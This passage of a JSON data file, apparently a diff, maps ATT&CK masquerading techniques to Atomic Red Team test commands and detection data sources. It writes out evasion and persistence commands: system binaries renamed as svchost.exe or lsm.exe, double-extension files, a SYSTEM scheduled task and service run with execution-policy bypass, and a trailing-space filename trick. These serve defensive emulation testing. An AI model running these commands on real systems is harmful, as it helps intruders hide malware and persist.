%SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y\ncmd.exe /c %APPDATA%\\notepad.exe /B\n", + "cleanup_command": "del /Q /F %APPDATA%\\notepad.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading - wscript.exe running as svchost.exe", + "auto_generated_guid": "24136435-c91a-4ede-9da1-8b284a1c1a23", + "description": "Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.\n\nUpon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y\ncmd.exe /c %APPDATA%\\svchost.exe /B\n", + "cleanup_command": "del /Q /F %APPDATA%\\svchost.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading - powershell.exe running as taskhostw.exe", + "auto_generated_guid": "ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa", + "description": "Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.\n\nUpon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y\ncmd.exe /K %APPDATA%\\taskhostw.exe\n", + "cleanup_command": "del /Q /F %APPDATA%\\taskhostw.exe >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Masquerading - non-windows exe running as windows exe", + "auto_generated_guid": "bc15c13f-d121-4b1f-8c7d-28d95854d086", + "description": "Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe\n\nUpon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "outputfile": { + "description": "path of file to execute", + "type": "Path", + "default": "($env:TEMP + \"\\svchost.exe\")" + }, + "inputfile": { + "description": "path of file to copy", + "type": "Path", + "default": "PathToAtomicsFolder\\T1036.003\\bin\\T1036.003.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Exe file to copy must exist on disk at specified location (#{inputfile})\n", + "prereq_command": "if (Test-Path #{inputfile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe\" -OutFile \"#{inputfile}\"\n" + } + ], + "executor": { + "command": "copy #{inputfile} #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "cleanup_command": "Remove-Item #{outputfile} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Masquerading - windows exe running as different windows exe", + "auto_generated_guid": "c3d24a39-2bfe-4c6a-b064-90cd73896cb0", + "description": "Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "outputfile": { + "description": "path of file to execute", + "type": "Path", + "default": "($env:TEMP + \"\\svchost.exe\")" + }, + "inputfile": { + "description": "path of file to copy", + "type": "Path", + "default": "$env:ComSpec" + } + }, + "executor": { + "command": "copy #{inputfile} #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "cleanup_command": "Remove-Item #{outputfile} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Malicious process Masquerading as LSM.exe", + "auto_generated_guid": "83810c46-f45e-4485-9ab6-8ed0e9e6ed7f", + "description": "Detect LSM running from an incorrect directory and an incorrect service account\nThis works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\\ folder.\n\nUpon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\lsm.exe\nC:\\lsm.exe /c echo T1036.003 > C:\\T1036.003.txt\n", + "cleanup_command": "del C:\\T1036.003.txt >nul 2>&1\ndel C:\\lsm.exe >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "File Extension Masquerading", + "auto_generated_guid": "c7fa0c3b-b57f-4cba-9118-863bf4e653fc", + "description": "download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.\n\ne.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_path": { + "description": "path to exe to use when creating masquerading files", + "type": "Path", + "default": "C:\\Windows\\System32\\calc.exe" + }, + "vbs_path": { + "description": "path of vbs to use when creating masquerading files", + "type": "Path", + "default": "PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.vbs" + }, + "ps1_path": { + "description": "path of powershell script to use when creating masquerading files", + "type": "Path", + "default": "PathToAtomicsFolder\\T1036.003\\src\\T1036.003_masquerading.ps1" + } + }, + "executor": { + "command": "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "cleanup_command": "del /f %temp%\\T1036.003_masquerading.docx.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.pdf.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.ps1.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.xls.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.xlsx.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.png.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.doc.ps1 > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.pdf.ps1 > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.rtf.ps1 > nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1036.004", + "command_list": [ + "schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file c:\\T1036.004_NonExistingScript.ps1\" /tn win32times /f\nschtasks /query /tn win32times\n", + "sc create win32times binPath= \"cmd /c start c:\\T1036.004_NonExistingScript.ps1\"\nsc qc win32times\n" + ], + "commands": [ + { + "command": "schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file c:\\T1036.004_NonExistingScript.ps1\" /tn win32times /f\nschtasks /query /tn win32times\n", + "source": "atomics/T1036.004/T1036.004.yaml", + "name": "Atomic Red Team Test - Masquerading: Masquerade Task or Service" + }, + { + "command": "sc create win32times binPath= \"cmd /c start c:\\T1036.004_NonExistingScript.ps1\"\nsc qc win32times\n", + "source": "atomics/T1036.004/T1036.004.yaml", + "name": "Atomic Red Team Test - Masquerading: Masquerade Task or Service" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036.004", + "display_name": "Masquerading: Masquerade Task or Service", + "atomic_tests": [ + { + "name": "Creating W32Time similar named service using schtasks", + "auto_generated_guid": "f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9", + "description": "Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed \"Operation Wocao\"", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file c:\\T1036.004_NonExistingScript.ps1\" /tn win32times /f\nschtasks /query /tn win32times\n", + "cleanup_command": "schtasks /tn win32times /delete /f\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Creating W32Time similar named service using sc", + "auto_generated_guid": "b721c6ef-472c-4263-a0d9-37f1f4ecff66", + "description": "Creating W32Time similar named service (win32times) using sc just like threat actor dubbed \"Operation Wocao\"", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "sc create win32times binPath= \"cmd /c start c:\\T1036.004_NonExistingScript.ps1\"\nsc qc win32times\n", + "cleanup_command": "sc delete win32times\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job metadata", + "description": "Data and information that describe a scheduled job and activity around it.", + "source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "enabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job modification", + "description": "A scheduled job was modified (e.g., the executable launched by the task was changed), either locally or remotely.", + "source_data_element": "process", + "relationship": "disabled", + "target_data_element": "scheduled job" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ] + ] + }, + { + "technique_id": "T1036.005", + "command_list": [ + "mkdir $HOME/...\ncp $(which sh) $HOME/...\n$HOME/.../sh -c \"echo Hello from the Atomic Red Team test T1036.005#1\"\n", + "Add-Type -TypeDefinition @'\npublic class Test {\n public static void Main(string[] args) {\n System.Console.WriteLine(\"tweet, tweet\");\n }\n}\n'@ -OutputAssembly \"$Env:windir\\Temp\\svchost.exe\"\n\nStart-Process -FilePath \"$Env:windir\\Temp\\svchost.exe\"\n" + ], + "commands": [ + { + "command": "mkdir $HOME/...\ncp $(which sh) $HOME/...\n$HOME/.../sh -c \"echo Hello from the Atomic Red Team test T1036.005#1\"\n", + "source": "atomics/T1036.005/T1036.005.yaml", + "name": "Atomic Red Team Test - Masquerading: Match Legitimate Name or Location" + }, + { + "command": "Add-Type -TypeDefinition @'\npublic class Test {\n public static void Main(string[] args) {\n System.Console.WriteLine(\"tweet, tweet\");\n }\n}\n'@ -OutputAssembly \"$Env:windir\\Temp\\svchost.exe\"\n\nStart-Process -FilePath \"$Env:windir\\Temp\\svchost.exe\"\n", + "source": "atomics/T1036.005/T1036.005.yaml", + "name": "Atomic Red Team Test - Masquerading: Match Legitimate Name or Location" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036.005", + "display_name": "Masquerading: Match Legitimate Name or Location", + "atomic_tests": [ + { + "name": "Execute a process from a directory masquerading as the current parent directory.", + "auto_generated_guid": "812c3ab8-94b0-4698-a9bf-9420af23ce24", + "description": "Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "test_message": { + "description": "Test message to echo out to the screen", + "type": "String", + "default": "Hello from the Atomic Red Team test T1036.005#1" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "mkdir $HOME/...\ncp $(which sh) $HOME/...\n$HOME/.../sh -c \"echo #{test_message}\"\n", + "cleanup_command": "rm -f $HOME/.../sh\nrmdir $HOME/.../\n" + } + }, + { + "name": "Masquerade as a built-in system executable", + "auto_generated_guid": "35eb8d16-9820-4423-a2a1-90c4f5edd9ca", + "description": "Launch an executable that attempts to masquerade as a legitimate executable.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_filepath": { + "description": "File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.", + "type": "String", + "default": "$Env:windir\\Temp\\svchost.exe" + } + }, + "executor": { + "command": "Add-Type -TypeDefinition @'\npublic class Test {\n public static void Main(string[] args) {\n System.Console.WriteLine(\"tweet, tweet\");\n }\n}\n'@ -OutputAssembly \"#{executable_filepath}\"\n\nStart-Process -FilePath \"#{executable_filepath}\"\n", + "cleanup_command": "Remove-Item -Path \"#{executable_filepath}\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image metadata", + "description": "Data and information that describe an image and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "image" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1036.006", + "command_list": [ + "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n" + ], + "commands": [ + { + "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", + "source": "atomics/T1036.006/T1036.006.yaml", + "name": "Atomic Red Team Test - Masquerading: Space after Filename" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1036.006", + "display_name": "Masquerading: Space after Filename", + "atomic_tests": [ + { + "name": "Space After Filename (Manual)", + "auto_generated_guid": "89a7dd26-e510-4c9f-9b15-f3bae333360f", + "description": "Space After Filename\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. echo '#!/bin/bash\\necho \"print \\\"hello, world!\\\"\" | /usr/bin/python\\nexit' > execute.txt && chmod +x execute.txt\n\n2. mv execute.txt \"execute.txt \"\n\n3. ./execute.txt\\ \n", + "name": "manual" + } + }, + { + "name": "Space After Filename", + "auto_generated_guid": "b95ce2eb-a093-4cd8-938d-5258cef656ea", + "description": "Space after filename.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "bash", + "command": "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir -p 'testdirwithspaceend '\n/usr/bin/echo -e \"%d\\na\\n#!/usr/bin/perl\\nprint \\\"running T1035.006 with space after filename to masquerade init\\\\n\\\";\\nqx/cp \\/usr\\/bin\\/perl 'init '/;\\nqx/'.\\/init ' -e 'sleep 5'/;\\n.\\nwq\\n\" | ed 'testdirwithspaceend /init ' >/dev/null\nchmod +x 'testdirwithspaceend /init '\n'./testdirwithspaceend /init '\n", + "cleanup_command": "rm -rf /tmp/atomic-test-T1036.006" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1036", + "command_list": [ + "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process \"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\" | out-null", + "Expand-Archive -Path $env:userprofile\\Downloads\\T1036.zip -DestinationPath $env:userprofile\\Downloads\\T1036 -Force\ncd $env:userprofile\\Downloads\\T1036\ncmd /c $env:userprofile\\Downloads\\T1036\\README.cmd >$null 2>$null", + "*.exe", + "\\Recycle.bin", + "\\Users\\All Users\\", + "\\Users\\Default\\", + "\\Users\\Public\\", + "\\Perflogs\\", + "\\config\\systemprofile\\", + "\\Windows\\Fonts\\", + "\\Windows\\IME\\", + "\\Windows\\addins\\", + "\\ProgramData\\", + "csrsr.exe", + "csrss.exe", + "!=*\\Windows\\System32\\", + "cssrss.exe", + "explorer.exe", + "iexplore.exe", + "isass.exe", + "lexplore.exe", + "lsm.exe", + "lssass.exe", + "mmc.exe", + "!=wininit.exe", + "lsass", + "run32dll.exe", + "rundII.exe", + "scvhost.exe", + "smss.exe", + "!=services.exe", + "svchost.exe", + "svchosts.exe" + ], + "commands": [ + { + "command": "copy-item \"$env:windir\\System32\\cmd.exe\" -destination \"$env:allusersprofile\\cmd.exe\"\nstart-process \"$env:allusersprofile\\cmd.exe\"\nsleep -s 5 \nstop-process -name \"cmd\" | out-null", + "source": "atomics/T1036/T1036.yaml", + "name": "Atomic Red Team Test - Masquerading" + }, + { + "command": "Expand-Archive -Path 